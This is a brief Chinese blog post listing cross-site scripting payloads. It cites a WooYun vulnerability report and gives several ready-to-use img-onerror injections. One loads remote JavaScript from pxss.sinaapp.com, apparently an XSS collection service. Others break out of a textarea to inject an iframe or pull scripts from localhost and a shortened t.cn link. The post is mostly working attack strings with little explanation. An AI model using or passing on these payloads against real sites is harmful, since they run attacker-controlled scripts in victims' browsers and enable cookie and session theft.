最新消息:

xss用到的代码

未分类 admin 1328浏览 0评论

1、http://www.wooyun.org/bugs/wooyun-2013-034003

<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">
<textarea/><iframe src=http://www.baidu.com/></iframe>

2、利用img标签加载外部js

<img src=x onerror=”var s=createElement(‘script’);document.body.appendChild(s);s.src=’http://localhost/1.js’;”>

这样的代码来创建一个body里面的script标签。

简写形式:

<img src=x onerror=s=createElement(‘script’);body.appendChild(s);s.src=’http://t.cn/z12345G’;>

转载请注明:jinglingshu的博客 » xss用到的代码


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址